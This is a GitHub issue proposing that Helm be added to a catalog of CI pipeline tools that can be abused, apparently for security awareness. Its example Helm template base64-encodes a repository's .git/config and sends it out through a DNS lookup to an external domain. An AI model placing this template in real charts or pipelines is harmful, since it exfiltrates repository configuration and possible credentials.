### ISSUE TITLE
[LOTP] Add Helm

### ISSUE THREAD

**Issue by Franck-Boost** [boostsecurityio/lotp#87]
# Description of the LOTP tool

[Helm Chart](https://helm.sh/)

# Configuration files

Helm can read files under the root of a chart. If the head of a repo happens to be a chart root one could read the .git/config file.

# Documentation
https://helm.sh/docs/chart_template_guide/accessing_files/ 
https://helm.sh/docs/chart_template_guide/functions_and_pipelines/

# Real-world example
```
apiVersion: v1
kind: ConfigMap
metadata:
  name: mychart-configmap
data:
   hello: {{  getHostByName (print (b64enc (.Files.Get ".git/config")) ".google.com") }}
```

# Additional notes 

They have a popular GitHub Action ...
